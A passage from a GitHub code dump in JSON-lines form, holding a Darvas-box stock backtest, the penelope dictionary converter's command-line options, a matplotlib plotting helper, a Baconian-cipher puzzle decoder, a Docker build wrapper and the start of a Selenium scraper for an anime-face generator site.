df_prices[i]\n\n# print(\"Initial Min/Max Values:\\n\", min_max_values)\n# # Create container for combined values\n# output = []\n# # Sort based on cluster minimum\n# s = sorted(min_max_values, key=lambda x: x[0])\n# # For each cluster get average of\n# for i, (_min, _max) in enumerate(s):\n# # Append min from first cluster\n# if i == 0:\n# output.append(_min)\n# # Append max from last cluster\n# if i == len(min_max_values) - 1:\n# output.append(_max)\n# # Append average from cluster and adjacent for all others\n# else:\n# output.append(sum([_max, s[i+1][0]]) / 2)\n\n# pd.options.plotting.backend = 'plotly'\n# colors = ['red', 'orange', 'yellow', 'green', 'blue', 'indigo']\n\n# fig = df.plot.scatter(\n# x=df.index,\n# y=\"close\",\n# color=[colors[i] for i in clusters],\n# )\n\n# # Add horizontal lines\n# for cluster_avg in output[1:-1]:\n# fig.add_hline(y=cluster_avg, line_width=1, line_color=\"blue\")\n \n# # Add a trace of the price for better clarity\n# fig.add_trace(go.Trace(\n# x=df.index,\n# y=df['close'],\n# line_color=\"black\",\n# line_width=1\n# ))\n\n# layout = go.Layout(\n# plot_bgcolor='#efefef',\n# showlegend=False,\n# # Font Families\n# font_family='Monospace',\n# font_color='#000000',\n# font_size=20,\n# xaxis=dict(\n# rangeslider=dict(\n# visible=False\n# ))\n# )\n\n# fig.update_layout(layout)\n# # Display plot in local browser window\n# fig.show()\n\n# Import libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport yfinance as yf\n\n# Define parameters\nstock = 'TSM' # Stock symbol or name\nstart_date = '2020-01-01' # Start date of the time range\nend_date = '2020-12-31' # End date of the time range\ninterval = '1d' # Interval of the data points\ncapital = 100000 # Initial capital\ntrade_amount = 0.1 # Trade amount or ratio\nheight_factor = 1.5 # Height factor for dynamic box height\nwidth_factor = 1.2 # Width factor for dynamic box width\nvolume_threshold = 2 # Volume threshold for buy or sell signals\n\n# Download data from Yahoo Finance\ndata = yf.download(stock, start=start_date, end=end_date, interval=interval)\ndata['Date'] = data.index # Add a Date column\n\n# Calculate the 20-day average volume\ndata['Avg_Volume'] = data['Volume'].rolling(20).mean()\n\n# Initialize variables\nbox_height = None # Box height\nbox_width = None # Box width\nbox_top = None # Box top\nbox_bottom = None # Box bottom\nposition = None # Position (long or short)\ntrade_price = None # Trade price\ntrade_volume = None # Trade volume\nbalance = capital # Balance\nprofit = 0 # Profit\nsignals = [] # List of signals (buy or sell)\ntrades = [] # List of trades (entry or exit)\n\n# Loop through the data\nfor i in range(len(data)):\n date = data['Date'][i] # Current date\n open_price = data['Open'][i] # Current open price\n high_price = data['High'][i] # Current high price\n low_price = data['Low'][i] # Current low price\n close_price = data['Close'][i] # Current close price\n volume = data['Volume'][i] # Current volume\n\n if box_height is None: # If no box height is set, use the first day's range as the initial box height\n box_height = high_price - low_price\n\n if box_width is None: # If no box width is set, use 1 as the initial box width\n box_width = 1\n\n if box_top is None: # If no box top is set, use the first day's high as the initial box top\n box_top = high_price\n\n if box_bottom is None: # If no box bottom is set, use the first day's low as the initial box bottom\n box_bottom = low_price\n\n if position is None: # If no position is set, use 'short' as the initial position\n position = 'short'\n\n signal = None # Initialize signal as None\n\n if position == 'short': # If in a short position, look for buy signals\n\n if volume > volume_threshold * data['Avg_Volume'][i]: # If volume exceeds the threshold\n\n if high_price > box_top: # If high price breaks above the box top\n\n signal = 'buy' # Generate a buy signal\n\n trade_price = max(open_price, box_top) # Set trade price as the maximum of open price and box top\n\n trade_volume = int(balance * trade_amount / trade_price) # Set trade volume as a fraction of balance\n\n balance -= trade_volume * trade_price # Deduct trade amount from balance\n\n position = 'long' # Switch to long position\n\n box_height *= height_factor # Update box height by multiplying with height factor\n\n box_width *= width_factor # Update box width by multiplying with width factor\n\n box_top += box_height # Update box top by adding box height\n\n box_bottom += box_height # Update box bottom by adding box height\n\n elif position == 'long': # If in a long position, look for sell signals\n\n if volume > volume_threshold * data['Avg_Volume'][i]: # If volume exceeds the threshold\n\n if low_price < box_bottom: # If low price breaks below the box bottom\n\n signal = 'sell' # Generate a sell signal\n\n trade_price = min(open_price, box_bottom) # Set trade price as the minimum of open price and box bottom\n\n trade_volume = int(balance * trade_amount / trade_price) # Set trade volume as a fraction of balance\n\n balance += trade_volume * trade_price # Add trade amount to balance\n\n profit += trade_volume * (trade_price - trades[-1][2]) # Calculate profit from the last entry trade\n\n position = 'short' # Switch to short position\n\n box_height *= height_factor # Update box height by multiplying with height factor\n\n box_width *= width_factor # Update box width by multiplying with width factor\n\n box_top -= box_height # Update box top by subtracting box height\n\n box_bottom -= box_height # Update box bottom by subtracting box height\n\n if signal is not None: # If a signal is generated, record it in the signals list\n signals.append((date, signal, trade_price, trade_volume))\n\n if signal == 'buy': # If a buy signal is generated, record it as an entry trade in the trades list\n trades.append((date, 'entry', trade_price, trade_volume))\n\n if signal == 'sell': # If a sell signal is generated, record it as an exit trade in the trades list\n trades.append((date, 'exit', trade_price, trade_volume))\n\n# Print results\nprint('Final balance:', balance)\nprint('Total profit:', profit)\nprint('Number of signals:', len(signals))\nprint('Number of trades:', len(trades))\n\n# Plot results\nplt.figure(figsize=(12, 8))\nplt.plot(data['Date'], data['Close'], label='Close Price')\nplt.plot(data['Date'], data['Avg_Volume'], label='Average Volume')\nfor signal in signals:\n if signal[1] == 'buy':\n plt.scatter(signal[0], signal[2], color='green', marker='^', label='Buy Signal')\n elif signal[1] == 'sell':\n plt.scatter(signal[0], signal[2], color='red', marker='v', label='Sell Signal')\nplt.legend()\nplt.title('Darvas Box Trading Strategy for ' + stock)\nplt.xlabel('Date')\nplt.ylabel('Price/Volume')\nplt.show()","repo_name":"Benson0802/futures_py","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":8352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30626200142","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\nThis file contains command line constants and functions.\n\"\"\"\n\nfrom __future__ import absolute_import\nimport datetime\nimport sys\n\nfrom penelope.utilities import get_uuid\nfrom penelope.utilities import print_error\n\n__author__ = \"Alberto Pettarin\"\n__copyright__ = \"Copyright 2012-2016, Alberto Pettarin (www.albertopettarin.it)\"\n__license__ = \"MIT\"\n__version__ = \"3.1.3\"\n__email__ = \"alberto@albertopettarin.it\"\n__status__ = \"Production\"\n\nINPUT_FORMATS = [\n \"bookeen\",\n \"csv\",\n \"kobo\",\n \"stardict\",\n \"xml\"\n]\n\nOUTPUT_FORMATS = [\n \"bookeen\",\n \"csv\",\n \"epub\",\n \"kobo\",\n \"mobi\",\n \"stardict\",\n \"xml\"\n]\n\nCOMMAND_LINE_PARAMETERS = [\n {\n \"short\": \"-d\",\n \"long\": \"--debug\",\n \"help\": \"enable debug mode (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": \"-f\",\n \"long\": \"--language-from\",\n \"help\": \"from language (ISO 639-1 code)\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-i\",\n \"long\": \"--input-file\",\n \"help\": \"input file name prefix(es). Multiple prefixes must be comma-separated.\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-j\",\n \"long\": \"--input-format\",\n \"help\": \"from format (values: %s)\" % \"|\".join(INPUT_FORMATS),\n \"action\": \"store\"\n },\n {\n \"short\": \"-k\",\n \"long\": \"--keep\",\n \"help\": \"keep temporary files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": \"-o\",\n \"long\": \"--output-file\",\n \"help\": \"output file name\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-p\",\n \"long\": \"--output-format\",\n \"help\": \"to format (values: %s)\" % \"|\".join(OUTPUT_FORMATS),\n \"action\": \"store\"\n },\n {\n \"short\": \"-t\",\n \"long\": \"--language-to\",\n \"help\": \"to language (ISO 639-1 code)\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-v\",\n \"long\": \"--version\",\n \"help\": \"print version and exit\",\n \"action\": \"store_true\"\n },\n\n {\n \"short\": None,\n \"long\": \"--author\",\n \"help\": \"author string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--copyright\",\n \"help\": \"copyright string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--cover-path\",\n \"help\": \"path of the cover image file\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--description\",\n \"help\": \"description string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--email\",\n \"help\": \"email string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--identifier\",\n \"help\": \"identifier string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--license\",\n \"help\": \"license string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--title\",\n \"help\": \"title string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--website\",\n \"help\": \"website string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--year\",\n \"help\": \"year string\",\n \"action\": \"store\"\n },\n\n {\n \"short\": None,\n \"long\": \"--apply-css\",\n \"help\": \"apply the given CSS file (epub and mobi output only)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--bookeen-collation-function\",\n \"help\": \"use the specified collation function\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--bookeen-install-file\",\n \"help\": \"create *.install file (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--csv-fs\",\n \"help\": \"CSV field separator (default: ',')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--csv-ignore-first-line\",\n \"help\": \"ignore the first line of the input CSV file(s) (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--csv-ls\",\n \"help\": \"CSV line separator (default: '\\\\n')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--dictzip-path\",\n \"help\": \"path to dictzip executable\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--epub-no-compress\",\n \"help\": \"do not create the compressed container (epub output only, default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--escape-strings\",\n \"help\": \"escape HTML strings (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--flatten-synonyms\",\n \"help\": \"flatten synonyms, creating a new entry with headword=synonym and using the definition of the original headword (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-function\",\n \"help\": \"compute the prefix of headwords using the given prefix function file\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-length\",\n \"help\": \"group headwords by prefix of given length (default: 2)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-merge-across-first\",\n \"help\": \"merge headword groups even when the first character changes (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-merge-min-size\",\n \"help\": \"merge headword groups until the given minimum number of headwords is reached (default: 0, meaning no merge will take place)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--ignore-case\",\n \"help\": \"ignore headword case, all headwords will be lowercased (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--ignore-synonyms\",\n \"help\": \"ignore synonyms, not reading/writing them if present (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--include-index-page\",\n \"help\": \"include an index page (epub and mobi output only, default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--input-file-encoding\",\n \"help\": \"use the specified encoding for reading the raw contents of input file(s) (default: 'utf-8')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--input-parser\",\n \"help\": \"use the specified parser function after reading the raw contents of input file(s)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--kindlegen-path\",\n \"help\": \"path to kindlegen executable\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--marisa-bin-path\",\n \"help\": \"path to MARISA bin directory\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--marisa-index-size\",\n \"help\": \"maximum size of the MARISA index (default: 1000000)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--merge-definitions\",\n \"help\": \"merge definitions for the same headword (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--merge-separator\",\n \"help\": \"add this string between merged definitions (default: ' | ')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--mobi-no-kindlegen\",\n \"help\": \"do not run kindlegen, keep .opf and .html files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--no-definitions\",\n \"help\": \"do not output definitions for EPUB and MOBI formats (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sd-ignore-sametypesequence\",\n \"help\": \"ignore the value of sametypesequence in StarDict .ifo files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sd-no-dictzip\",\n \"help\": \"do not compress the .dict file in StarDict files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-after\",\n \"help\": \"sort after merging/flattening (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-before\",\n \"help\": \"sort before merging/flattening (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-by-definition\",\n \"help\": \"sort by definition (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-by-headword\",\n \"help\": \"sort by headword (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-ignore-case\",\n \"help\": \"ignore case when sorting (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-reverse\",\n \"help\": \"reverse the sort order (default: False)\",\n \"action\": \"store_true\"\n },\n]\n\nREQUIRED_PARAMETERS = [\n \"input_file\",\n \"input_format\",\n \"language_from\",\n \"language_to\",\n \"output_format\",\n \"output_file\"\n]\n\nEXAMPLES = [\n # {\n # \"options\": \"-h\",\n # \"description\": \"Print this message and exit\"\n # },\n # {\n # \"options\": \"-v\",\n # \"description\": \"Print the version and exit\"\n # },\n {\n \"options\": \"-i dict.csv -j csv -f en -t it -p stardict -o output.zip\",\n \"description\": \"Convert en->it dictionary dict.csv (in CSV format) into output.zip (in StarDict format)\"\n },\n {\n \"options\": \"-i dict.csv -j csv -f en -t it -p stardict -o output.zip --merge-definitions\",\n \"description\": \"As above, but also merge definitions\"\n },\n {\n \"options\": \"-i d1,d2,d3 -j csv -f en -t it -p csv -o output.csv --sort-after --sort-by-headword\",\n \"description\": \"Merge CSV dictionaries d1, d2, and d3 into output.csv, sorting by headword\"\n },\n {\n \"options\": \"-i d1,d2,d3 -j csv -f en -t it -p csv -o output.csv --sort-after --sort-by-headword --sort-ignore-case\",\n \"description\": \"As above, but ignore case for sorting\"\n },\n {\n \"options\": \"-i d1,d2,d3 -j csv -f en -t it -p csv -o output.csv --sort-after --sort-by-headword --sort-reverse\",\n \"description\": \"As above, but reverse the order\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p csv -o output.csv\",\n \"description\": \"Convert en->it dictionary dict.zip (in StarDict format) into output.csv (in CSV format)\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p csv -o output.csv --ignore-synonyms\",\n \"description\": \"As above, but do not read the .syn synonym file if present\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p csv -o output.csv --flatten-synonyms\",\n \"description\": \"As above, but flatten synonyms\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p bookeen -o output\",\n \"description\": \"Convert dict.zip into output.dict.idx and output.dict for Bookeen devices\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p kobo -o dicthtml-en-it\",\n \"description\": \"Convert dict.zip into dicthtml-en-it.zip for Kobo devices\"\n },\n {\n \"options\": \"-i dict.csv -j csv -f en -t it -p mobi -o output.mobi --cover-path mycover.png --title \\\"My English->Italian Dictionary\\\"\",\n \"description\": \"Convert dict.csv into a MOBI (Kindle) dictionary, using the specified cover image and title\"\n },\n {\n \"options\": \"-i dict.xml -j xml -f en -t it -p mobi -o output.epub\",\n \"description\": \"Convert dict.xml into an EPUB dictionary\"\n },\n {\n \"options\": \"-i dict.xml -j xml -f en -t it -p mobi -o output.epub --epub-output-definitions\",\n \"description\": \"As above, but also output definitions\"\n },\n]\n\nUSAGE = u\"\"\"\n $ penelope -h\n $ penelope -i INPUT_FILE -j INPUT_FORMAT -f LANGUAGE_FROM -t LANGUAGE_TO -p OUTPUT_FORMAT -o OUTPUT_FILE [OPTIONS]\n $ penelope -i IN1,IN2[,IN3...] -j INPUT_FORMAT -f LANGUAGE_FROM -t LANGUAGE_TO -p OUTPUT_FORMAT -o OUTPUT_FILE [OPTIONS]\n\"\"\"\n\nDESCRIPTION = u\"\"\"description:\n Convert dictionary file(s) with file name prefix INPUT_FILE from format INPUT_FORMAT to format OUTPUT_FORMAT, saving it as OUTPUT_FILE.\n The dictionary is from LANGUAGE_FROM to LANGUAGE_TO, possibly the same.\n You can merge several dictionaries (with the same format), by providing a list of comma-separated prefixes, as shown by the third synopsis above.\"\"\"\n\nEPILOG = u\"examples:\\n\"\nfor example in EXAMPLES:\n EPILOG += u\"\\n\"\n EPILOG += u\" $ penelope %s\\n\" % (example[\"options\"])\n EPILOG += u\" %s\\n\" % (example[\"description\"])\nEPILOG += u\" \\n\"\n\n\ndef check_arguments(args):\n \"\"\"\n Check that we have all the required command line arguments,\n and that the input/output format values are supported.\n \"\"\"\n for required in REQUIRED_PARAMETERS:\n if required not in args:\n print_error(\"Argument '%s' is required\" % required)\n sys.exit(2)\n if args.input_format not in INPUT_FORMATS:\n print_error(\"Format '%s' is not a valid input format\" % args.input_format)\n print_error(\"Valid input formats: %s\" % INPUT_FORMATS)\n sys.exit(4)\n if args.output_format not in OUTPUT_FORMATS:\n print_error(\"Format '%s' is not a valid output format\" % args.output_format)\n print_error(\"Valid output formats: %s\" % OUTPUT_FORMATS)\n sys.exit(4)\n\n\ndef set_default_values(args):\n def set_default_value(key, value):\n if not args.__contains__(key):\n args.__dict__[key] = value\n set_default_value(\"apply_css\", None)\n set_default_value(\"bookeen_collation_function\", None)\n set_default_value(\"bookeen_install_file\", False)\n set_default_value(\"csv_fs\", \",\")\n set_default_value(\"csv_ignore_first_line\", False)\n set_default_value(\"csv_ls\", \"\\n\")\n set_default_value(\"debug\", False)\n set_default_value(\"dictzip_path\", None)\n set_default_value(\"epub_no_compress\", False)\n set_default_value(\"escape_strings\", False)\n set_default_value(\"flatten_synonyms\", False)\n set_default_value(\"group_by_prefix_length\", 2)\n set_default_value(\"group_by_prefix_function\", None)\n set_default_value(\"group_by_prefix_merge_across_first\", False)\n set_default_value(\"group_by_prefix_merge_min_size\", 0)\n set_default_value(\"ignore_case\", False)\n set_default_value(\"ignore_synonyms\", False)\n set_default_value(\"include_index_page\", False)\n set_default_value(\"input_file_encoding\", \"utf-8\")\n set_default_value(\"input_parser\", None)\n set_default_value(\"keep\", False)\n set_default_value(\"kindlegen_path\", None)\n set_default_value(\"marisa_bin_path\", None)\n set_default_value(\"marisa_index_size\", 1000000)\n set_default_value(\"merge_definitions\", False)\n set_default_value(\"merge_separator\", \" | \")\n set_default_value(\"mobi_no_kindlegen\", False)\n set_default_value(\"no_definitions\", False)\n set_default_value(\"sd_ignore_sametypesequence\", False)\n set_default_value(\"sd_no_dictzip\", False)\n set_default_value(\"sort_after\", False)\n set_default_value(\"sort_before\", False)\n set_default_value(\"sort_by_definition\", False)\n set_default_value(\"sort_by_headword\", False)\n set_default_value(\"sort_ignore_case\", False)\n set_default_value(\"sort_reverse\", False)\n set_default_value(\"version\", False)\n set_default_value(\"author\", u\"Penelope\")\n set_default_value(\"copyright\", u\"GNU GPL v3\")\n set_default_value(\"cover_path\", None)\n set_default_value(\"description\", u\"Dictionary %s to %s\" % (args.language_from, args.language_to))\n set_default_value(\"email\", u\"penelopedictionaryconverter@gmail.com\")\n set_default_value(\"identifier\", get_uuid())\n set_default_value(\"license\", u\"GNU GPL v3\")\n set_default_value(\"title\", u\"Dictionary %s to %s\" % (args.language_from, args.language_to))\n set_default_value(\"website\", u\"https://goo.gl/EB5XSR\")\n set_default_value(\"year\", str(datetime.datetime.now().year))\n","repo_name":"pettarin/penelope","sub_path":"penelope/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":16582,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"53"} +{"seq_id":"38293587784","text":"'''\nCreated on May 04, 2019\n\n@author: dulan\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path as osp\nimport os\n\nclass Graph(object):\n def __init__(self, save_loc = 'output', filename='untitled'):\n self.save_loc = save_loc\n if not osp.exists(self.save_loc):\n os.makedirs(self.save_loc)\n self.filename = self.set_filename(filename)\n self.ylabel = ''\n self.xlabel = ''\n self.title = ''\n self.legend_1 = None\n self.legend_2 = None\n\n def set_filename(self, filename):\n self.filename= osp.join(self.save_loc, filename + '.png')\n\n def set_lables(self, title, xlabel, ylabel_1, ylabel_2=''):\n self.title = title\n self.xlabel = xlabel\n self.ylabel = ylabel_1\n self.ylabel_2 = ylabel_2\n\n def set_legends(self, legend_1, legend_2, legend_3):\n self.legend_1 = legend_1\n self.legend_2 = legend_2\n self.legend_3 = legend_3\n\n def set_names(self):\n plt.xlabel(self.xlabel)\n plt.ylabel(self.ylabel)\n plt.title(self.title)\n\n def plot(self, a_list, filename=None):\n self.set_names()\n plt.plot(a_list)\n if filename is not None:\n self.set_filename(filename)\n if self.legend_1 is not None:\n plt.gca().legend((self.legend_1))\n plt.savefig(self.filename+'.png')\n plt.clf()\n\n def plot_xy(self, x_list, y_list, filename=None):\n self.set_names()\n plt.plot(y_list, x_list)\n if filename is not None:\n self.set_filename(filename)\n plt.savefig(self.filename+'.png')\n plt.clf()\n\n def plot_2(self, a_list, b_list, filename=None):\n self.set_names()\n plt.plot(a_list)\n plt.plot(b_list)\n if self.legend_1 is not None and self.legend_2 is not None:\n plt.gca().legend((self.legend_1, self.legend_2))\n if filename is not None:\n self.set_filename(filename)\n plt.savefig(self.filename+'.png')\n plt.clf()\n\n def plot_2sub(self, a_list, b_list, filename=None):\n self.set_names()\n fig, ax1 = plt.subplots()\n\n color = 'tab:red'\n ax1.set_title(self.title)\n ax1.set_xlabel(self.xlabel)\n ax1.set_ylabel(self.ylabel, color=color)\n ax1.plot(a_list, color=color, label=self.legend_1)\n ax1.tick_params(axis='y', labelcolor=color)\n\n color = 'tab:blue'\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n ax2.set_ylabel(self.ylabel_2, color=color) # we already handled the x-label with ax1\n ax2.plot(b_list, color=color, label=self.legend_2)\n ax2.tick_params(axis='y', labelcolor=color)\n\n fig.tight_layout()\n\n if filename is not None:\n self.set_filename(filename)\n plt.savefig(self.filename+'.png')\n plt.clf()\n\n def plot_3sub(self, a_list, b_list, c_list, filename=None):\n self.set_names()\n fig, ax1 = plt.subplots()\n\n color = 'tab:red'\n ax1.set_title(self.title)\n ax1.set_xlabel(self.xlabel)\n ax1.set_ylabel(self.ylabel, color=color)\n ax1.plot(a_list, color=color, label=self.legend_1)\n ax1.tick_params(axis='y', labelcolor=color)\n\n color = 'tab:blue'\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n ax2.set_ylabel(self.ylabel_2) # we already handled the x-label with ax1\n ax2.plot(b_list, color=color, label=self.legend_2)\n # ax2.tick_params(axis='y', labelcolor=color)\n\n color = 'tab:green'\n ax2.plot(c_list, color=color, label=self.legend_3)\n\n fig.tight_layout()\n ax1.legend()\n ax2.legend()\n\n if filename is not None:\n self.set_filename(filename)\n plt.savefig(self.filename+'.png')\n plt.clf()\n\n\nif __name__ == '__main__':\n gr_obj = Graph('hello3')\n # gr_obj.set_lables('this is title', 'x label', 'y label')\n # gr_obj.set_legends('legend 1', 'legend_2', 'legend_3')\n # gr_obj.plot_3sub([1, 2, 3], [10, 25, 30], [5, 35, 30])\n\n list1 = [1, 0.5, 0.4]\n list2 = [0.5, 0.7, 0.78]\n list3 = [0.5, 0.69, 0.75]\n gr_obj.set_lables('main', 'label1', 'label2', 'label3')\n gr_obj.set_legends('main', 'label1', 'label2')\n gr_obj.plot_3sub(list1, list2, list3, 'plot-xy')\n","repo_name":"CodeProcessor/MyLib","sub_path":"mylib/ml/graphs/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39382429798","text":"import string\nfrom itertools import zip_longest\n\nciphertext_old = \"001010111001001001110110100001\"\nciphertext = \"1001001101101001010110100101011010101101001001011001001001100110011011001010\"\nciphertext_new = ciphertext.replace(\"0\", \"2\").replace(\"1\", \"0\").replace(\"2\", \"1\")\nfor i in zip_longest(*[iter(ciphertext_new)]*5, fillvalue=\"\"):\n i = int(\"\".join(i), 2)\n print(string.ascii_lowercase[i-1], end=\"\")\n\nciphertext2 = ciphertext.replace(\"0\", \"-\").replace(\"1\", \".\")\nciphertext3 = ciphertext.replace(\"0\", \".\").replace(\"1\", \"-\")\nciphertext4 = ciphertext[::-1].replace(\"0\", \"-\").replace(\"1\", \".\")\nciphertext5 = ciphertext[::-1].replace(\"0\", \".\").replace(\"1\", \"-\")\nprint(ciphertext2)\nprint(ciphertext3)\nprint(ciphertext4)\nprint(ciphertext5)\n","repo_name":"sidharthmrao/Cryptography_DS","sub_path":"misc/scientia_potentia_est/baconian_brute.py","file_name":"baconian_brute.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10401997288","text":"#!/usr/bin/python3\n\nimport os, shutil, subprocess, sys\n\nbranch = 'hardknott'\n\nprint('python run-docker.py with Branch ', branch)\nprint('==========================================')\nmy_env = os.environ.copy()\nif sys.platform.startswith('win'): # is win\n cwd = os.getcwd().replace('\\\\', '/')\nelse: # is linux:\n cwd = os.getcwd()\n\nimage = 'openvario/' + branch + ':latest'\n\nprint(' Path-Variable is: ', cwd, '!!!!!!!!!!!!!!')\n\ndockerfile = 'scripts/Dockerfile'\n\n# test image detection\nout = open('docker-out.txt', 'w')\nmyprocess = subprocess.Popen(['docker', 'image', 'ls', '-q', image], env = my_env, cwd = cwd, stdout = out, shell = False)\nmyprocess.wait()\nout.close()\n\nout = open('docker-out.txt', 'r')\nimage_id = out.read()\nout.close()\n\nprint('image: ', image,', image-id = ', image_id, ' --- ', len(image_id))\n\nif len(image_id) > 0: # with_docker_build:\n myprocess = subprocess.Popen(['docker', 'build', '--file', dockerfile, '-t', image, './'], env = my_env, cwd = cwd, shell = False)\n myprocess.wait()\n\ntarget_dir = '/opt/openvario'\nif sys.platform.startswith('win'):\n # is win, but this is very preliminary\n target_dir = '/home/pokyuser' # overwrite previous!\n # myprocess = subprocess.Popen(['docker', 'run', '-u \"pokyuser\"' , '--rm', '--mount', 'type=bind,source='+ cwd + ',target=' + target_dir, '-it', image\n # myprocess = subprocess.Popen(['docker', 'run', '--rm', '--mount', 'type=bind,source='+ cwd + ',target=' + target_dir, '-it', image\n myprocess = subprocess.Popen(['docker', 'run', '--rm', '--mount', 'type=bind,source='+ cwd + ',target=' + target_dir, '-it', image\n , './build-image.py' ], env = my_env, cwd = cwd, shell = False)\n # , '/opt/openvario/build-image.py' ], env = my_env, cwd = cwd, shell = False)\nelse:\n # is linux:\n # target_dir = '/home/pokyuser'\n if with_docker_build:\n myprocess = subprocess.Popen(['docker', 'build', '--file', dockerfile, '-t', image, './'], env = my_env, cwd = cwd, shell = False)\n myprocess.wait()\n\nmyprocess = subprocess.Popen(['docker', 'run', '--rm', '--mount', 'type=bind,source='+ cwd + ',target=' + target_dir, '-it', image\n , '--workdir=' + target_dir], env = my_env, cwd = cwd, shell = False)\nmyprocess.wait()\n\nprint('Finish: run-docker.py')\n\n","repo_name":"August2111/OpenVario0","sub_path":"run-docker.py","file_name":"run-docker.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6007812355","text":"import numpy\nimport base64\nimport threading\nfrom bottle import *\nfrom PIL import Image\nfrom io import BytesIO\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n\ndef image_to_data(image):\n pb = numpy.array(image.convert('RGB')).astype('uint16')\n color = ((pb[:,:,2] >> 3) << 11) | ((pb[:,:,1] >> 2) << 5) | (pb[:,:,0] >> 3)\n return bytes(numpy.dstack(((color >> 8) & 0xFF, color & 0xFF)).flatten().tolist())\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\nchrome = webdriver.Chrome(chrome_options = options)\n\ntry:\n wait = WebDriverWait(chrome, 60*5)\n\n chrome.get('http://make.girls.moe')\n\n btn = chrome.find_element_by_css_selector('.generator > button')\n\n print('Loading model...')\n wait.until(lambda _: btn.is_enabled())\n print('Done')\n btn.click()\n wait.until(lambda _: btn.is_enabled())\n img = chrome.find_element_by_css_selector('.result-canvas > img')\n\n moes = []\n\n loading = False\n\n @get('/tft')\n def get_moe():\n while not moes: pass\n moe = moes.pop()\n 